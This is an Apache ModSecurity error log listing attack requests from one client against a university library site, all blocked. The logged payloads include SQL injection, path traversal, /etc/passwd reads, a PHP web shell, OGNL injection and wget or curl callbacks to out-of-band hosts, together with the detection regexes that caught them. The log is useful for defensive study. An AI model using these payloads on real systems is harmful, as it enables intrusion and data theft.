[Tue Aug 29 11:34:32.338858 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ReaderNo: `cat/etc/passwd > eekovulpxo.txt`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11WMCo-f0AAATSkmsAAAAT"]
[Tue Aug 29 11:34:33.309127 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ' = ' found within ARGS:username: admin' or '1' = '1'; -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/dfsms/"] [unique_id "ZO11WcCo-f0AAATZp48AAAAf"]
[Tue Aug 29 11:34:35.356114 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:PARAM. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:PARAM: 127.0.0.1 -c 0 cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/PDC/ajaxreq.php"] [unique_id "ZO11W8Co-f0AAATlLD8AAAAq"]
[Tue Aug 29 11:34:37.310135 2023] [:error] [pid 1299] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:radioBtnVal. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0a         found within ARGS:radioBtnVal: <?php\\x0a        if(isset($_GET['cmd']))\\x0a        {\\x0a            system($_GET['cmd']);\\x0a        }?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ajaxPages/writeBrowseFilePathAjax.php"] [unique_id "ZO11XcCo-f0AAAUTiWkAAABJ"]
[Tue Aug 29 11:34:38.304588 2023] [:error] [pid 1310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:resource. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../ found within ARGS:resource: net/sf/jasperreports/../../../../js.jdbc.properties"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/jasperserver-pro/reportresource/reportresource/"] [unique_id "ZO11XsCo-f0AAAUeP8MAAABT"]
[Tue Aug 29 11:34:38.326026 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at REQUEST_COOKIES:sessionid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within REQUEST_COOKIES:sessionid: '`wget http:/cjmn8l5jmimk2adbbnlgfesaao6rswi3z.oast.site`'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/upload"] [unique_id "ZO11XsCo-f0AAAUOaTIAAABG"]
[Tue Aug 29 11:34:38.332334 2023] [:error] [pid 1240] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:cmd: sudo rpm --eval '%{lua:os.execute(\\x22curl http:/cjmn8l5jmimk2adbbnlgjmx7rfpsag6ao.oast.site -H 'User-Agent: j4is1X'\\x22)}'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/2Udxk4yGnOuoFAW3lL1AZ4txHQj.php"] [unique_id "ZO11XsCo-f0AAATYeDkAAAAd"]
[Tue Aug 29 11:34:41.338725 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:orderBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:orderBy: 1/**/or/**/updatexml(1,concat(0x7e,md5('999999999'),0x7e),1)/**/or/**/1"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/mdiy/dict/listExcludeApp"] [unique_id "ZO11YcCo-f0AAATSknIAAAAT"]
[Tue Aug 29 11:34:42.316069 2023] [:error] [pid 1262] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO11YsCo-f0AAATus0kAAAAv"]
[Tue Aug 29 11:34:44.301729 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ipbackend. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ipbackend:  cat/etc/passwd ##"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/app/options.py"] [unique_id "ZO11ZMCo-f0AAAUXLiMAAABM"]
[Tue Aug 29 11:34:49.305526 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11acCo-f0AAASHh8oAAAAD"]
[Tue Aug 29 11:34:49.322968 2023] [:error] [pid 1288] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filter_tag. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:filter_tag: 1)\\x22 union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5  join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5(999999999))a20 join (select 2)a21 join (select 2)a22 join ..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11acCo-f0AAAUIz7gAAABA"]
[Tue Aug 29 11:34:49.331878 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22/tic/core/resource/js/erp_data.jsp\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO11acCo-f0AAAUQ7sAAAABH"]
[Tue Aug 29 11:34:49.348773 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:league_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:league_id: 1' AND (SELECT 1909 FROM (SELECT(SLEEP(6)))ZiBf)-- qODp"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11acCo-f0AAASHh8sAAAAD"]
[Tue Aug 29 11:34:51.573743 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:last_timestamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:last_timestamp: 0) UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11a8Co-f0AAAShCZcAAAAi"]
[Tue Aug 29 11:34:52.319413 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO11bMCo-f0AAAUDQTEAAAA7"]
[Tue Aug 29 11:34:52.320376 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:json. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22/ found within ARGS:json: {\\x22url\\x22:\\x22/general/../../mysql5/my.ini\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ispirit/interface/gateway.php"] [unique_id "ZO11bMCo-f0AAAUZcFcAAABO"]
[Tue Aug 29 11:34:53.313314 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ipAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:ipAddress: `/bin/wget http:/cjmn8l5jmimk2adbbnlgd4wpud9e3gaxj.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/Collector/diagnostics/trace_route"] [unique_id "ZO11bcCo-f0AAATWYRkAAAAa"]
[Tue Aug 29 11:34:53.331074 2023] [:error] [pid 1241] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:template_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:template_id: 1 and sleep(6)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11bcCo-f0AAATZp6gAAAAf"]
[Tue Aug 29 11:34:53.336996 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/compliancepolicies.inc.php"] [unique_id "ZO11bcCo-f0AAASI0EcAAAAG"]
[Tue Aug 29 11:34:55.366339 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:rlist[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`,  found within ARGS:rlist[]: @`'`, extractvalue(1, concat_ws(0x20, 0x5c,(select md5(999999999)))),@`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/comment/api/index.php"] [unique_id "ZO11b8Co-f0AAASI0EsAAAAG"]
[Tue Aug 29 11:34:56.309780 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11cMCo-f0AAAVK0HEAAAAB"]
[Tue Aug 29 11:34:56.340573 2023] [:error] [pid 1297] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '='' found within ARGS:email: '=''or'@email.com"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/login.php"] [unique_id "ZO11cMCo-f0AAAUR84UAAABI"]
[Tue Aug 29 11:34:56.342869 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11cMCo-f0AAATQXhwAAAAO"]
[Tue Aug 29 11:34:57.311427 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11ccCo-f0AAATPtScAAAAM"]
[Tue Aug 29 11:34:57.332051 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11ccCo-f0AAAUJIywAAABB"]
[Tue Aug 29 11:34:57.355344 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAUNalAAAABF"]
[Tue Aug 29 11:34:58.314439 2023] [:error] [pid 1239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAATXLMIAAAAb"]
[Tue Aug 29 11:34:59.320331 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAAT2JRAAAAAz"]
[Tue Aug 29 11:35:01.303272 2023] [:error] [pid 1307] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAUbg1UAAABQ"]
[Tue Aug 29 11:35:02.306263 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAUQ7sYAAABH"]
[Tue Aug 29 11:35:02.358980 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: 